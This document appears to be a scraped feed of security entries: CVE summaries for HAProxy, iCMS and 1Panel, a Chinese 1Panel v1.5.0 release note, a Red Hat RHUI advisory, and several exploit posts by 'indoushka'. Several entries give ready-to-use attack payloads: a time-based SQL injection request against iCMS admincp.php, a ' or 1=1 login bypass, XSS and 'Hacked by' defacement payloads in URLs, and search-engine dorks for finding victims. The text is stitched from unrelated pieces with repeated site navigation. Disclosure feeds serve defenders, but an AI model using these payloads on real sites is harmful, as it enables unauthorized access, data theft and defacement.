HAProxy through 2.0.32, 2.1.x and 2.2.x through 2.2.30, 2.3.x and 2.4.x through 2.4.23, 2.5.x and 2.6.x before 2.6.15, 2.7.x before 2.7.10, and 2.8.x before 2.8.2 forwards empty Content-Length headers, violating RFC 9110 section 8.6. In uncommon cases, an HTTP/1 server behind HAProxy may interpret the payload as an extra request.

CVE-2023-40225

iCMS v7.0.16 was discovered to contain a SQL injection vulnerability via the bakupdata function.

CVE-2023-39806

iCMS v7.0.16 was discovered to contain a SQL injection vulnerability via the where parameter at admincp.php.

\[CVE-ID\]

CVE-2023-39805

\------------------------------------------

\[Description\]

iCMS v7.0.16 was discovered to contain a SQL injection vulnerability

via the where parameter at admincp.php.

\------------------------------------------

\[Vulnerability Type\]

SQL Injection

\------------------------------------------

\[Vendor of Product\]

icmsdev

\------------------------------------------

\[Affected Product Code Base\]

icms V7.0.16 - V7.0.16

\------------------------------------------

\[Affected Component\]

icms<=V7.0.16

\------------------------------------------

\[Attack Type\]

Remote

\------------------------------------------

\[Impact Information Disclosure\]

true

\------------------------------------------

\[Attack Vectors\]

POST /icms/admincp.php?app=database&do=query&frame=iPHP&CSRF\_TOKEN=fe334f6fgxSmDHDpZeekNtohnt-hBYXBAOJkd5xXq\_XXz5vaYOwEoS\_nJrEdZo26EJVC0fA0SkLpfBFFzcE4ly18oxAoBMoCTr22qJ8 HTTP/1.1

Cookie: iCMS\_ADMIN\_AUTH=23f0a4caAp2o-gYF7T1PFGTY0fdLZd43ZdGHuQY1NnyOjOUDHZxyC\_CewgaX5uR1iNHfEz\_Pj20qTaPC\_NZlv9CKoxpPtJ80fBz7nbiMensa6tkGlbYrpw; XDEBUG\_SESSION=11807

field=tkd&pattern=123123&replacement=1231321&where=where+id=1+AND+(SELECT+\*+FROM+(SELECT(SLEEP(10)))testsql)

\------------------------------------------

\[Has vendor confirmed or acknowledged the vulnerability?\]

true

\------------------------------------------

\[Discoverer\]

chubby

\------------------------------------------

\[Reference\]

http://icms.com

http://icmsdev.com

CVE-2023-39805: CVE-2023-39805

1Panel is an open source Linux server operation and maintenance management panel. In version 1.4.3, an arbitrary file write vulnerability could lead to direct control of the server. In the `api/v1/file.go` file, there is a function called `SaveContentthat,It `recieves JSON data sent by users in the form of a POST request. And the lack of parameter filtering allows for arbitrary file write operations. Version 1.5.0 contains a patch for this issue.

**一、安装和升级****1.1 一键安装**

**CentOS/RHEL**

curl -sSL https://resource.fit2cloud.com/1panel/package/quick\_start.sh -o quick\_start.sh && sh quick\_start.sh

**Ubuntu**

curl -sSL https://resource.fit2cloud.com/1panel/package/quick\_start.sh -o quick\_start.sh && sudo bash quick\_start.sh

**Debian**

curl -sSL https://resource.fit2cloud.com/1panel/package/quick\_start.sh -o quick\_start.sh && bash quick\_start.sh

**1.2 在线升级**

登录 1Panel Web 控制台，在页面右下角点击 **【检查更新】** 进行在线升级。

> 更多信息请查阅在线文档：https://1panel.cn/docs/

**二、更新日志****2.1 新特性**

*   【网站】支持 PHP 运行环境类型网站切换版本。 by @zhengkunwang223 in #1748
*   【网站】支持网站设置重定向。 by @zhengkunwang223 in #1731
*   【数据库】支持添加 MySQL 远程数据库。 by @ssongliu in #1744
*   【主机】增加进程守护管理。 by @zhengkunwang223 in #1786

**2.2 功能优化**

*   【网站】网站设置 IPv6 功能优化。 by @zhengkunwang223 in #1732
*   【网站】网站防盗链页面样式优化。 by @zhengkunwang223 in #1807
*   【网站】网站设置页面添加反向代理时支持用户选择传输协议。 by @zhengkunwang223 in #1832
*   【网站】编辑 PHP 运行环境后增加关联应用重建的提示信息。 by @zhengkunwang223 in #1896
*   【应用商店】应用升级时增加备份选项。 by @zhengkunwang223 in #1750
*   【应用商店】已安装应用列表增加 HTTPS 类型端口的跳转功能。 by @zhengkunwang223 in #1870
*   【应用商店】全部应用和已安装应用列表页面样式优化。 by @zhengkunwang223 in #1895
*   【应用商店】应用依赖 Redis 时，创建页面自动填充 Redis 密码。 by @zhengkunwang223 in #1826
*   【数据库】数据库密码校验规则优化。 by @ssongliu in #1815
*   【数据库】数据库连接信息样式优化。 by @ssongliu in #1857
*   【容器】容器创建页面部分字段翻译优化。 by @SkyAerope in #1797
*   【主机】文件列表记录文件浏览器最后一次访问的路径。 by @zhengkunwang223 in #1753
*   【主机】文件列表页面适配移动端。 by @wangdan-fit2cloud in #1730
*   【主机】监控页面调整数据默认采集间隔和保存时间。 by @ssongliu in #1795
*   【面板设置】创建系统快照前停止所有定时任务。 by @ssongliu in #1888
*   【面板设置】服务器地址支持设置域名。 by @ssongliu in #1778
*   【面板设置】备份账号页面部分按钮样式优化。 by @ssongliu in #1893
*   【面板设置】创建快照逻辑优化。 by @ssongliu in #1805
*   【系统】登录页增加切换语言选项。 by @zhengkunwang223 in #1752
*   【系统】部分页面样式适配移动端。 by @wangdan-fit2cloud in #1891
*   【系统】移除不必要的 SSH Session 连接。 by @LeeEirc in #1780
*   【系统】部分页面分页排序样式优化。 by @ssongliu in #1821
*   【系统】创建抽屉页面不再动态显示名称。 by @ssongliu in #1777

**2.3 问题修复**

*   【网站】修复了部分场景下创建 PHP 运行环境异常的问题。 by @zhengkunwang223 in #1882
*   【应用商店】修复了应用升级后无法编辑最新配置的问题。 by @zhengkunwang223 in #1824
*   【应用商店】修复了更新应用列表后可能出现多个同名应用的问题。 by @zhengkunwang223 in #1827
*   【应用商店】修复了 Cloudreve 升级后数据丢失的问题。 by @zhengkunwang223 in #1822
*   【应用商店】修复了编辑应用时关闭高级设置之后没有提示端口放开的问题。 by @zhengkunwang223 in #1887
*   【应用商店】修复了安装应用时数据库密码包含 & $ 等特殊字符时提示错误的问题。 by @zhengkunwang223 in #1809
*   【数据库】修复了数据库日志监听未刷新的问题。 by @ssongliu in #1823
*   【容器】修复了编辑容器时不显示手动挂载的挂载卷的问题。 by @ssongliu in #1783
*   【容器】修复了编辑容器时由于端口冲突导致容器被删除的问题。 by @ssongliu in #1770
*   【主机】修复了文件压缩时无法选择文件夹的问题。 by @zhengkunwang223 in #1802
*   【主机】修复了当 SSH 登录日志涉及多个年份时导致数据异常的问题。 by @ssongliu in #1785
*   【面板设置】修复了同步快照路径错误的问题。 by @ssongliu in #1863
*   【系统】修复了系统安装在根目录时导致升级失败的问题。 by @ssongliu in #1776

**2.4 应用商店**

*   新增 JumpServer。 by @wojiushixiaobai in 1Panel-dev/appstore#238
*   新增 SFTPGo。 by @wanghe-fit2cloud in 1Panel-dev/appstore#269
*   新增 PGAdmin4。 by @wojiushixiaobai in 1Panel-dev/appstore#246
*   新增 frp。 by @okxlin in 1Panel-dev/appstore#299
*   新增 Discuz。 by @okxlin in 1Panel-dev/appstore#227
*   新增 Nextcloud。 by @okxlin in 1Panel-dev/appstore#299
*   新增 Domain Admin。 by @mouday in 1Panel-dev/appstore#278
*   新增 emlog。 by @emlog in 1Panel-dev/appstore#276
*   新增 ZFile。 by @okxlin in 1Panel-dev/appstore#299
*   新增 MeiliSearch。 by @CyJaySong in 1Panel-dev/appstore#219
*   新增 ChatGPT Web。 by @okxlin in 1Panel-dev/appstore#274
*   新增 Home Assistant。 by @okxlin in 1Panel-dev/appstore#299
*   AdGuardHome 版本升级至 v0.107.36。 by @renovate in 1Panel-dev/appstore#293
*   OpenResty 版本升级至 1.21.4.2-0。 by @wuhang2003 in 1Panel-dev/appstore#300
*   Tailchat 版本升级至 v1.8.8。 by @renovate in 1Panel-dev/appstore#305
*   青龙 版本升级至 v2.16.0。 by @renovate in 1Panel-dev/appstore#306
*   ddns-go 版本升级至 v5.6.0。 by @renovate in 1Panel-dev/appstore#307
*   Memos 版本升级至 v0.14.3。 by @renovate in 1Panel-dev/appstore#304
*   Jenkins 版本升级至 v2.418。 by @renovate in 1Panel-dev/appstore#312
*   Cloudreve 版本升级至 v3.8.2。 by @renovate in 1Panel-dev/appstore#308
*   Alist 版本升级至 v3.25.1。 by @renovate in 1Panel-dev/appstore#309

**2.5 安全更新**

*   修复了部分文件接口存在任意文件读取漏洞的问题。 (CVE-2023-39964)
*   修复了部分文件接口存在任意文件下载漏洞的问题。 (CVE-2023-39965)
*   修复了部分文件接口存在任意文件写入漏洞的问题。 (CVE-2023-39966)

CVE-2023-39966: Release v1.5.0 · 1Panel-dev/1Panel

Red Hat Security Advisory 2023-4591-01 - Red Hat Update Infrastructure offers a highly scalable, highly redundant framework that enables you to manage repositories and content. It also enables cloud providers to deliver content and updates to Red Hat Enterprise Linux instances. Issues addressed include bypass and denial of service vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: RHUI 4.5.0 release - Security, Bug Fixes, and Enhancements  
Advisory ID:       RHSA-2023:4591-01  
Product:           Red Hat Update Infrastructure  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4591  
Issue date:        2023-08-09  
CVE Names:         CVE-2023-30608 CVE-2023-31047   
=====================================================================

1. Summary:

An updated version of Red Hat Update Infrastructure (RHUI) is now  
available. RHUI 4.5 fixes several security and operational bugs and also  
adds several new features.

2. Relevant releases/architectures:

RHUI 4 for RHEL 8 - noarch

3. Description:

Red Hat Update Infrastructure (RHUI) offers a highly scalable, highly  
redundant framework that enables you to manage repositories and content. It  
also enables cloud providers to deliver content and updates to Red Hat  
Enterprise Linux (RHEL) instances.

Security Fix(es):  
* Django: Potential bypass of validation when uploading multiple files  
using a single form field (CVE-2023-31047)

* sqlparse: Parser contains a regular expression that is vulnerable to  
ReDOS (Regular Expression Denial of Service) (CVE-2023-30608)

This RHUI update fixes the following bugs:

* Previously, the `rhui-manager` command used the `logname` command to  
obtain the login name. However, when `rhui-manager` is run using the  
`rhui-repo-sync` cron job, a login name is not defined. Consequently,  
emails sent by the cron job contained the error message `logname: no login  
name`. With this update, `rhui-manager` does not obtain the login name  
using the `logname` command and the error message is no longer generated.

* Previously, when an invalid repository ID was used with the  
`rhui-manager` command to synchronize or delete a repository, the command  
failed with following error:  
`An unexpected error has occurred during the last operation.`  
Additionally, a traceback was also logged.   
With this update, the error message has been improved and failure to run no  
longer logs a traceback.

This RHUI update introduces the following enhancements:

* With this update, the client configuration RPMs in `rhui-manager` prevent  
subscription manager from automatically enabling `yum` plugins. As a  
result, RHUI repository users will no longer see irrelevant messages from  
subscription manager. (BZ#1957871)

* With this update, you can generate machine-readable files with the status  
of each RHUI repository. To use this feature, run the following command:  
`rhui-manager --non-interactive status --repo_json <output file>`  
 (BZ#2079391)

* With this update, the `rhui-manager` CLI command uses a variety of unique  
exit codes to indicate different types of errors. For example, if you  
attempt to add a Red Hat repository that has already been added, the  
command will exit with a status of 245. However, if you attempt to add a  
Red Hat repository that does not exist in the RHUI entitlement, the command  
will exit with a status of 246. For a complete list of codes, see the  
`/usr/lib/python3.6/site-packages/rhui/common/rhui_exit_codes.py` file.

4. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For detailed instructions on how to apply this update, see:  
https://access.redhat.com/documentation/en-us/red_hat_update_infrastructure/4/html/migrating_red_hat_update_infrastructure/assembly_upgrading-red-hat-update-infrastructure_migrating-red-hat-update-infrastructure

For other information, see the product documentation:  
https://access.redhat.com/documentation/en-us/red_hat_update_infrastructure/4

5. Bugs fixed (https://bugzilla.redhat.com/):

1957871 - [RFE} Client rpms created in RHUI don't prevent auto-enable of subscription manager plugins  
2079391 - Feature request to provide sync/repo status of each repo in a JSON file for automated monitoring  
2187903 - CVE-2023-30608 sqlparse: Parser contains a regular expression that is vulnerable to ReDOS (Regular Expression Denial of Service)  
2192565 - CVE-2023-31047 python-django: Potential bypass of validation when uploading multiple files using one form field

6. JIRA issues fixed (https://issues.redhat.com/):

RHUI-217 - [RFE] Client rpms created in RHUI don't prevent auto-enable of subscription manager plugins  
RHUI-263 - [RFE] Bug 2079391 - Feature request to provide sync/repo status of each repo in a JSON file for automated monitoring  
RHUI-356 - "logname: no login name" appears, twice, in e-mails sent by the rhui-repo-sync cron job  
RHUI-395 - Change error reporting of rhui-manager to be configurable  
RHUI-424 - repo deletion for an un-added repo results in a traceback  
RHUI-430 - Installation fails on RHEL 8.9  
RHUI-75 - repo sync for an un-added repo results in a traceback

7. Package List:

RHUI 4 for RHEL 8:

Source:  
python-django-3.2.19-1.0.1.el8ui.src.rpm  
python-sqlparse-0.4.4-1.0.1.el8ui.src.rpm  
rhui-installer-4.5.0.1-1.el8ui.src.rpm  
rhui-tools-4.5.0.5-1.el8ui.src.rpm

noarch:  
python39-django-3.2.19-1.0.1.el8ui.noarch.rpm  
python39-sqlparse-0.4.4-1.0.1.el8ui.noarch.rpm  
rhui-installer-4.5.0.1-1.el8ui.noarch.rpm  
rhui-tools-4.5.0.5-1.el8ui.noarch.rpm  
rhui-tools-libs-4.5.0.5-1.el8ui.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

8. References:

https://access.redhat.com/security/cve/CVE-2023-30608  
https://access.redhat.com/security/cve/CVE-2023-31047  
https://access.redhat.com/security/updates/classification/#moderate

9. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk0/U2AAoJENzjgjWX9erEb/8P/jYIo/4EGwCzZUR1npbmdew7  
5p4Lb3Nun23gnBGKDLrbbQqQjyjNbzbzlmjxVAfYnNTNqDHurCZ8SCsLitXR7CN6  
fQrMMCN7xAXjfTLNHl/w9QANqKGkfRa9pf5rRSvufgrh9XSvzlzPpzuihtUsBRjH  
MFEtA3QOiuvyJKXzqWTdWqt0NPCycSfJnm5MhI94C8UeVlFAdm0yEYMDfhV6iRFE  
RJx/LITiaks4FQ1RxAumkqoUrmfk+jsim0a5unfq+5hWubBFAvDo6VXpMPL20pcZ  
MJyVkay6aQQg7dmCzXyXW8kGy/ZwYfjCML1qabh6aLW4dTz5saj6G8UbZiMeKfrh  
SPTEMJbJU0pH7UIGgB2/v2xffsdmTkxgCY0xu75eokcWa4PSRE3UsZ7HRy5aAJRk  
uEWizCXHjQw9HkPnlTcOaQKLS3Fv9qG2tn6XWxmHlo2VrL88rDlmylyL/1euFDHQ  
ihaDj5AuHNWrZgBgghKPr89BkO6AiPAoYvg2Ld2bxXtMUohTVdxM00EVTmZImR1M  
N0NxrpFqQJPFfiN2MFmdl90pzLvwLYcMM7TTyBGxb6J9bSuP2/gEHsDBth7+m17n  
dmwym0w5xv9Z+yMF9KgdcDffBXnzkFdv/tSSh6sFzqpFGtMvKfyGbFAzkx3SG9MG  
SXC8b0Et+9GnN9s7cg/K  
=UP7R  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4591-01

DriverPack Solution CMS version 17.11.108 suffers from a cross site scripting vulnerability.

**DriverPack Solution CMS 17.11.108 Cross Site Scripting**

Posted Aug 10, 2023

Authored by indoushka

DriverPack Solution CMS version 17.11.108 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | e6bbd0f2f85c5a85db0341ad4fa0a655765bd7b91a5cc41a6d0b07469ab56025

Download | Favorite | View

**DriverPack Solution CMS 17.11.108 Cross Site Scripting**

    ====================================================================================================================================| # Title     : DriverPack Solution CMS v 17.11.108 Xss Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://driverpack.io/                                                                                             |  | # Dork      : n/a                                                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Use xss payload : _%3C/script%3E%3Cscript%3Eprompt(/indoushka/)%3C/script%3E&password=zeb[+] http://target_site/en?email=_%3C/script%3E%3Cscript%3Eprompt(/indoushka/)%3C/script%3E&password=zebGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,928)
*   Arbitrary (16,193)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,275)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,344)
*   DoS (23,416)
*   Encryption (2,370)
*   Exploit (51,848)
*   File Inclusion (4,221)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,768)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,670)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,144)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,759)
*   Root (3,580)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,886)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,364)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,767)
*   Web (9,662)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,930)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,810)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,423)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,711)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,805)
*   UNIX (9,289)
*   UnixWare (186)
*   Windows (6,572)
*   Other

DriverPack Solution CMS 17.11.108 Cross Site Scripting

DMIS:CRI LMS version 2.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : DMIS:CRI LMS V2.0 SQL Injection Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 67.0.1(64-bit)                                             | | # Vendor    : http://dmis.cri2.go.th/                                                                                            |  | # Dork      : ระบบฐานข้อมูลสารสนเทศเพื่อการบริหารจัดการศึกษา สำนักงานเขตพื้นที่การศึกษาประถมศึกษาเชียงราย เขต 2                                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : http://127.0.0.1/dmiscri2goth/school_detail.php?sid=15 <=== inject here[+] http://127.0.0.1/dmiscri2.goth/manage/profileshow.php <=== PanelGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

DMIS:CRI LMS 2.0 SQL Injection

Digisha CMS version 1.2.7 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Digisha CMS V1.2.7 Auth by pass Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             | | # Vendor    : http://www.digisha.com/                                                                                            |  | # Dork      : Powered by Digisha                                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user & pass = 1' or 1=1 -- -[+] http://127.0.0.1/ksminesindiacom/admin/welcome.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Digisha CMS 1.2.7 SQL Injection

DigaSell Digital Store PHP Script version 1.0.0 suffers from a remote blind SQL injection vulnerability.

    ====================================================================================================================================| # Title     : DigaSell - Digital store PHP Script V1.0.0 Blind Sql Injection Vulnerability                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://codecanyon.net/item/digasell-digital-store-php-script/23580305?s_rank=2                                    |  | # Dork      : "Copyright  © DigaSell All Rights Reserved."                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : http://127.0.0.1/codsemcom/digasell/search?term=1 <==== inject here                  [+] Panel       : https://127.0.0.1/codsemcom/digasell/admin/dashboardGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

DigaSell Digital Store PHP Script 1.0.0 SQL Injection

Desenvolvido C3iM CMS version 2.0 suffers from a cross site scripting vulnerability.

**Desenvolvido C3iM CMS 2.0 Cross Site Scripting**

Posted Aug 10, 2023

Authored by indoushka

Desenvolvido C3iM CMS version 2.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | ee75f970e155669b73118332fbaa7e9c33f33900005bfc151805b9ba771cd102

Download | Favorite | View

**Desenvolvido C3iM CMS 2.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Desenvolvido C3iM CMS v2.0 XSS Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : http://c3im.pt/                                                                                                    |  | # Dork      : intext:''Desenvolvido C3iM'' site:pt                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : <marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://127.0.0.1/conteudo.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,928)
*   Arbitrary (16,193)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,275)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,344)
*   DoS (23,416)
*   Encryption (2,370)
*   Exploit (51,848)
*   File Inclusion (4,221)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,768)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,670)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,144)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,759)
*   Root (3,580)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,886)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,364)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,767)
*   Web (9,662)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,930)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,810)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,423)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,711)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,805)
*   UNIX (9,289)
*   UnixWare (186)
*   Windows (6,572)
*   Other

Tag

#sql